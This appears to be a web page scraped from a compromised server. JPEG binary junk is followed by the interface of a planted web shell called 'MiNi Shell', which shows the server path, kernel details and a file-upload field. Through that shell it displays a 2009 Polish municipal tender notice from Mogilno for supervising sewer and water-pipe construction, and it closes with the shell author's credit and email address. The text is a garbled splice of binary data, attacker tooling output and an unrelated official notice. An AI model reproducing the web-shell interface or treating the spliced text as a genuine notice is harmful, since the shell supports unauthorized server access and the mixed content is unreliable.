JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090722/249598-N-2009.html

<p class="kh_header"><b>Mogilno: Wykonywanie usług w zakresie nadzoru inwestorskiego na zadaniu 
Uregulowanie gospodarki wodno-ściekowej w mieście Mogilnie oraz usług w zakresie rozliczenia środków finansowych inwestycji.</b><br>
<b>Numer ogłoszenia: 249598 - 2009; data zamieszczenia: 22.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Mogilna , ul. Gabriela Narutowicza 1, 88-300 Mogilno, woj. kujawsko-pomorskie, tel. 052 3185520, faks 052 3152693.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług w zakresie nadzoru inwestorskiego na zadaniu 
Uregulowanie gospodarki wodno-ściekowej w mieście Mogilnie oraz usług w zakresie rozliczenia środków finansowych inwestycji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest nadzór inwestorski branży wodno-kanalizacyjnej,    elektrycznej oraz drogowej na zadaniu Uregulowanie gospodarki wodno-ściekowej w mieście Mogilnie o następującym zakresie:
Część I - zadanie 1: Remont i przebudowa istniejącego kanału sanitarnego od       ul. Kasprowicza do ul. 22-stycznia  z rur PVC O 315o długości 172 m,
studnie rewizyjne z kręgów betonowych O 1200 szt 10
zadanie 2: Konserwacja rowu melioracyjnego R-18 pomiędzy projektowanym wylotem w ul. Mrugowskiego, a przepustem drogowym ul. Ogrodowej o długości 324 m.
zadanie 3: Budowa kanalizacji sanitarnej i deszczowej w ul. Mrugowskiego,  
Olszaka, Niewiadomskiego, Łuczaka, Ogrodowej, Bukietowej,Kwiatowej, Wiosennej i Słonecznej, w tym:
ETAP I
Budowa kanalizacji sanitarnej  i deszczowej w ul. Brodowskiego, Mrugowskiego, Łuczaka, Niewiadomskiego, Olszaka, Kwiatowej, Wiosennej i Słonecznej w tym :
Sieć kanalizacji sanitarnej z rur PVC O 315 - m 20,0;O 250 - m 2,0;O 200 - m 1 386,0; Sieć kanaliz. ciśnieniowej z rur PE PN10 O 160 - m    465,0;Przykanaliki O 160 - m    102,0;
Studnie rewizyjne z kręgów betonowych O 1200 - szt    56;
Przepompownie ścieków z kręgów betonowych O 1500 - szt      1;Sieć kanalizacji deszczowej z rur PVC O  315 - m   656,0;  O  400 - m   525,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt    33; ETAP II
Budowa kanalizacji sanitarnej i deszczowej w ul. Bukietowej i Ogrodowej ( zlewnia przepompowni P-1, separator II ), w tym: Sieć kanalizacji sanitarnej z rur PVC O 200 - m     575,0; Przykanaliki O 160 - m       49,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt      19; Sieć kanalizacji deszczowej z rur PVC O  315 -     m   150,0; O  400 - m    265,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt     11; Separator zintegrowany z osadnikiem -  szt 1;
 ETAP III
 Budowa kanalizacji sanitarnej i deszczowej w ul. Ogrodowej (zlewnia     przepompowni P-2, separator I) w tym:
Sieć kanalizacji sanitarnej z rur PVC O 200 - m     392,0; Sieć kanaliz. ciśnieniowej z rur PE PN10 O 110 - m     275,0; Przykanaliki  O 160 - m       53,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt      23; Przepompownie ścieków z polimerobetonu O 1200 -  szt        1; Sieć kanalizacji deszczowej z rur PVC O  315  - m   356,0; Studnie rewizyjne z kręgów betonowych O 1200 -                szt    11; Separator zintegrowany z osadnikiem - szt      1;
Część II - zadanie 4 Przebudowa sieci wodociągowej w Mogilnie - ul. Niezłomnych,
w tym: Sieć wodociągowa z rur cieśn. PE O 400 - m  48,0;
Przewiert kontrolowany przewodu  PE O 400 - m     619,0;
zadanie 5 Budowa sieci kanalizacji sanitarnej i deszczowej w ul. Prusa,  Niezłomnych, Miłosza, Polnej, Sienkiewicza, Grobla oraz sieci wodociągowej w ul. Miłosza, w tym:
ETAP I 
Budowa sieci kanalizacji sanitarnej i deszczowej w ul. Polnej, Grobla,Sienkiewicza:
Sieć kanalizacji sanitarnej z rur PPSN10 O 160 - m  399,0;
O 200 - m   1387,0; 250 - m 34,0; Sieć kanaliz. ciśnieniowej z rur PE 100 O 110 -m     341,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt      14;
Studnie rewizyjne z kręgów betonowych O 1000 - szt      49; Studnie rewizyjne PP O 400/315 -  szt      55; Przepompownie ścieków z polimerobetonu O 1500 -         szt        1; Sieć kanalizacji deszczowej z rur PPSN10 O  160 - m   148,0; O 315 - m   643,0; O  400 - m   367,0; O  500 - m    136,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt    11; O 1000 - szt    32; O   500 - szt    54; Separator zintegrowany z osadnikiem - szt      1;
ETAP II
Budowa sieci kanalizacji sanitarnej, deszczowej i wodociągowej w ul. Prusa i Miłosza: Sieć kanalizacji sanitarnej z rur PPSN10 O 160 - m     772,0; O 200 - m   1702,0; Sieć kanaliz. ciśnieniowej z rur PE 100 O 90 - m     247,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt       9; Studnie rewizyjne z kręgów betonowych O 1000 - szt      69; Studnie rewizyjne PP O 400/315 - szt    113;
Przepompownie ścieków z polimerobetonu O 1500 - szt        1;
Sieć kanalizacji deszczowej z rur PPSN10 O  160 - m    155,0; O  315 -                m    792,0; Studnie rewizyjne z kręgów betonowych O 1200 - szt       3; O 1000 -  szt     23; O   500 - szt     30; Sieć wodociągowa z rur PE SDR 11 O   110 - m  1183,0;
ETAP III
Budowa kanalizacji sanitarnej i deszczowej w ul. Niezłomnych:
Sieć kanalizacji sanitarnej z rur PPSN10 O 160 - m      94,0; O 200 - m 504,0;
Studnie kanalizacyjne PP O 1000 - szt      25; Studnie rewizyjne PP O 400/315 - szt      21; Sieć kanalizacji deszczowej z rur PPSN10 O  315 - m   133,0;
Studnie kanalizacyjne PP O 1000 -  szt       4;

oraz wykonywanie usług w zakresie rozliczenia środków finansowych wydatkowanych na realizację inwestycji objętej nadzorem inwestorskim w ramach niniejszego zamówienia publicznego z Instytucją Zarządzającą Projektem w ramach którego realizowana jest niniejsza inwestycja.  
Szczegółowy zakres robót budowlanych, o których mowa w pkt. 3.1. SIWZ zawierają przedmiary robót stanowiące załączniki nr 7 i załącznik 7a do SIWZ.
3.2 Opis  przedmiotu zamówienia:
Obowiązkiem Wykonawcy będzie wykonywanie nadzoru inwestorskiego w zakresie określonym w pkt. 3.1. SIWZ, przez osoby posiadające wymagane do tego uprawnienia i kwalifikacje oraz wykonywanie usług w zakresie rozliczenia środków wydatkowanych na realizację inwestycji objętej w/w nadzorem inwestycyjnym. Do obowiązków szczegółowych Wykonawcy będzie należało wyznaczenie Kierownika Zespołu do spraw rozliczeń i koordynowania prac inspektorów nadzoru specjalności wodno-kanalizacyjnej, specjalności elektrycznej oraz inspektor nadzoru o specjalności drogowej.

Do obowiązków Kierownika Zespołu i inspektorów nadzoru będzie należało:

1) Na etapie realizacji, odbioru i rozliczania robót:
a) powiadomienie organu nadzoru budowlanego o terminie rozpoczęcia robót, z załączeniem oświadczeń kierownika budowy i inspektorów nadzoru, potwierdzających przyjęcie obowiązków na budowie,
b) sprawowanie kontroli zgodności realizowania robót z dokumentacją projektową i pozwoleniem na budowę, przepisami i obowiązującymi Polskimi Normami oraz zasadami wiedzy technicznej,
c) organizowanie i prowadzenie narad koordynacyjnych, w siedzibie Zamawiającego zgodnie z ustalonym  harmonogramem, 
d) sprawdzanie jakości wykonanych robót, wbudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i  stosowania                    w budownictwie,
e) kontrola i odbiór robót budowlanych ulegających zakryciu,
f) nadzór nad pracą inspektorów, zobowiązanie i egzekwowanie od inspektorów nadzoru robót sanitarnych wykonywania przez nich obowiązków co najmniej raz w tygodniu bezpośrednio na placu budowy,
g) zapewnienie obecności Kierownika zespołu i inspektorów nadzoru na cotygodniowych naradach koordynacyjnych,
h) kontrola zgodności dostaw instalacji i urządzeń technicznych z dokumentacją i harmonogramem oraz uczestniczenie w przeprowadzanych próbach i odbiorach  technicznych instalacji i urządzeń,
i) składanie Zamawiającemu co miesiąc, na piśmie informacji z postępu prac, z załączoną dokumentacją fotograficzną,
j) w przypadku wystąpienia takiej potrzeby - inicjowanie wprowadzenia zmian w dokumentacji projektowej, z punktu widzenia przyszłej eksploatacji, przy udziale nadzoru autorskiego                            i Zamawiającego, po uzyskaniu wcześniejszej zgody Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013,
k)  nadzorowanie przeprowadzenia prób, badań, rozruchu mechanicznego przepompowni,
l) przeprowadzanie odbiorów w otwartym wykopie,
ł) potwierdzenie gotowości  do odbioru końcowego zadania inwestycyjnego,
m) zorganizowanie odbioru   końcowego,
n) uczestnictwo w pracach Komisji odbioru końcowego inwestycji, przy udziale  przedstawicieli Zamawiającego, Wykonawcy robót budowlanych i Użytkownika,
o) sprawdzenie kompletności dokumentacji powykonawczej, otrzymanej od wykonawcy                         i  przekazanie jej Zamawiającemu w dniu odbioru przedmiotu umowy,
p) rozliczenie końcowe robót.

2) Na etapie rozliczania środków finansowych

a) przygotowanie w porozumieniu z Zamawiającym wniosków o płatność (pośrednie i końcową) zgodnie ze wzorem opracowanym przez (IZ) Instytucję Zarządzającą RPO WK-P na lata 2007-2013, 
b) skompletowanie i sprawdzenie dokumentów rzeczowo - finansowych niezbędnych do przygotowania wniosków o płatność,
c)  czuwanie nad terminowością składania wniosków o płatność,
d)  monitorowanie obiegu wniosku o płatność od momentu złożenia w IZ do wpływu środków finansowych na konto Zamawiającego,
e)  dyscyplina i kontrola wydatkowania środków pomocowych UE pod względem zgodności z założonym w umowie o dofinansowanie harmonogramem rzeczowo - finansowym projektu,
f)  przygotowanie innych niezbędnych dokumentów finansowych wymaganych przez IŻ,  
g) końcowe rozliczenie finansowe projektu z IZ w terminie określonym w umowie                                   o dofinansowanie,
h)  czynny udział z ramienia Zamawiającego w kontroli przeprowadzonej przez IZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.00.00-2, 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający  wymaga  wniesienia wadium w kwocie 3.000,00 zł. (słownie: trzy tysiące zł). 
2. Wadium może być wniesione w formach przewidzianych art. 45 ust. 6 ustawy.
3. Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego
 Bank Millennium S.A. Mogilno, nr konta 51116022020000000060887659 .
4. Wniesienie wadium w pieniądzu będzie skuteczne, z chwilą uznania kwoty wadium na rachunku bankowym Zamawiającego przed terminem składania ofert tj do dnia  30 lipca 2009 r. godz. 10.00.
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6. W przypadku wniesienia wadium w formie gwarancji z jej treści musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust.5 ustawy Prawo zamówień publicznych.
7. Dokument potwierdzający wniesienie wadium w formie innej niż pieniądz należy załączyć w oryginale do oferty.
8. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta, zostanie uznana za odrzuconą.
9. Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z rachunku bankowego, na którym było ono przechowywane pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawcy biorący , udział w postępowaniu muszą spełnić następujące warunki:

W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ust 1 ustawy Prawo zamówień publicznych w szczególności : 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4) wskażą do wykonywania niniejszego zamówienia następujące osoby wraz z dokumentami potwierdzającymi ich kwalifikacje zawodowe, doświadczenie i wykształcenie,  niezbędne do wykonania zamówienia :
a) 1 osobę na stanowisko Kierownika Zespołu, posiadającą wyższe wykształcenie techniczne oraz uprawnienia budowlane w  branży sanitarnej, która  w  ciągu ostatnich trzech lat licząc od dnia wszczęcia  niniejszego postępowania sporządzała dokumenty do rozliczenia co  najmniej jednej inwestycji z udziałem środków unijnych, posiadającą 5 letnie doświadczenie zawodowe, w tym minimum 2 lata w kierowaniu zespołem ludzi prowadzących nadzór nad inwestycjami budowlanymi
b)1 osobę na stanowisko inspektora nadzoru w branży wodociągowej i sanitarnej
posiadającą  uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie sieci wodociągowych i kanalizacyjnych oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 10 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową , inspektor musi wykazać się doświadczeniem w nadzorowaniu  co najmniej jednego zadania polegającego na budowie kanalizacji sanitarnej o długości min. 8 km i trzech przepompowni w okresie ostatnich trzech lat.
c) 1 osobę na stanowisko inspektora nadzoru w branży drogowej,
posiadającą  uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej, oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa,  doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową związane z budową dróg lub odbudową nawierzchni drogowych 
d) 1 osobę na stanowisko inspektora nadzoru w specjalności elektrycznej, posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacji elektrycznych  oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa, doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową związanych z budową min. 3 przepompowni ścieków w ramach jednego zadania inwestycyjnego.
5) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia:
      są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej  działalności.

Zamawiający oceni spełnienie w/w warunków udziału w postępowaniu na podstawie analizy dokumentów i informacji przedłożonych przez Wykonawców na zasadzie kwalifikacji spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonania przedmiotu zamówienia oraz nie podlega wykluczeniu na podstawie art. 24
ust. 1 i 2  ustawy Prawo zamówień publicznych, powinien do oferty dołączyć:

  1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert;
	2)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert;
  3) oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 i nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, na druku, który stanowi załącznik nr 3 do SIWZ
2.W celu potwierdzenia, opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda załączenia do oferty następujących dokumentów:
1)	wykaz osób, które będą wykonywały zamówienie, zgodnie z niżej wymienionymi    
      wymaganiami - (Załącznik nr 4 do SIWZ ) : 
      
 a) osoba na stanowisko Kierownika Zespołu, posiadającą wyższe wykształcenie techniczne oraz uprawnienia budowlane w  branży sanitarnej, która  w  ciągu ostatnich trzech lat licząc od dnia wszczęcia  niniejszego postępowania sporządzała dokumenty do rozliczenia co  najmniej jednej inwestycji z udziałem środków unijnych, posiadającą 5 letnie doświadczenie zawodowe, w tym minimum 2 lata w kierowaniu zespołem ludzi prowadzących nadzór nad inwestycjami budowlanymi
b) osoba na stanowisko inspektora nadzoru w branży wodociągowej i sanitarnej
posiadającą  uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie sieci wodociągowych i kanalizacyjnych oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 10 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową , inspektor musi wykazać się doświadczeniem w nadzorowaniu  co najmniej jednego zadania polegającego na budowie kanalizacji sanitarnej o długości min. 8 km i trzech przepompowni w okresie ostatnich trzech lat.
c) osoba na stanowisko inspektora nadzoru w branży drogowej,
posiadającą  uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej, oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa,  doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową związane z budową dróg lub odbudową nawierzchni drogowych 
d) osoba na stanowisko inspektora nadzoru w specjalności elektrycznej, posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacji elektrycznych  oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa, doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową związanych z budową min. 3 przepompowni ścieków w ramach jednego zadania inwestycyjnego.
      oraz  
      dokumenty stwierdzające, że osoby wymienione w cz.7.2. pkt.1 lit.(a-d) posiadają odpowiednie kwalifikacje niezbędne do wykonania samodzielnych funkcji technicznych w ramach niniejszego zamówienia wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz  są osobami należącymi do Okręgowej Izby Inżynierów Budownictwa.

3. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda dostarczenia następujących dokumentów do oferty: 

a)  polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest   
     ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.mogilno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mogilnie, ul. Narutowicza 1, 88-300 Mogilno, pokój nr 210.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Urząd Miejski w Mogilnie, ul. Narutowicza 1, 88-300 Mogilno, pokój nr 106 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com